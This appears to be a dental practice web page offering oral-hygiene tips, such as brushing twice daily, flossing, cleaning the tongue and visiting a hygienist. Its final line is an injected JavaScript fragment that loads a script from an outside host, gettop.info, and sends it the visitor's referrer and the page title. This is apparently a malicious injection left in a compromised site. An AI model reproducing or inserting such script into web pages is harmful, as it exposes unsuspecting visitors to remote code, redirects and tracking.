The importance of brushing your teeth twice a day can’t be stressed enough. Not only can, not brushing your teeth lead to cavities and gum disease but it can also lead to more serious illnesses like heart disease and dementia.
Apart from good oral hygiene it is important to visit a Dental Hygienist regularly. They work closely with the whole dental team to prevent and treat dental diseases. During an appointment, the Dental Hygienist will observe your condition and recommend the best treatment for you. Also plaque and tartar will be removed where necessary from your teeth.
Plaque and Tartar eat away at your enamel and cause cavities and decay. Not only that, but it can also cause bad breath and stain your teeth. Plaque that is not removed quickly enough turns into Tartar. The only way to remove Tartar from your teeth is by a Dental Hygienist.
Simple tips that make a huge difference:
- Brush your teeth twice a day (do not rinse after brushing to give toothpaste longer to work)
- Don’t brush your teeth too hard. Brushing your teeth too vigorously and in wrong way will cause your gums to recede, which can lead to sensitivity. Always brush in gentle circular motion
- Don’t forget to brush your tongue. Most mouth odors come from the back surface of the tongue!
- Floss at least once day. The most important time is before going to bed
- Visit your dentist/ dental hygienist 2 a year
- Diabetics need to be more vigilant as they are more likely to develop gum disease
- Avoid bad oral health habits like smoking and biting finger nails
- For information on protecting your Child’s Oral Health please click here
Please remember: Prevention is always better than treatment!
s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;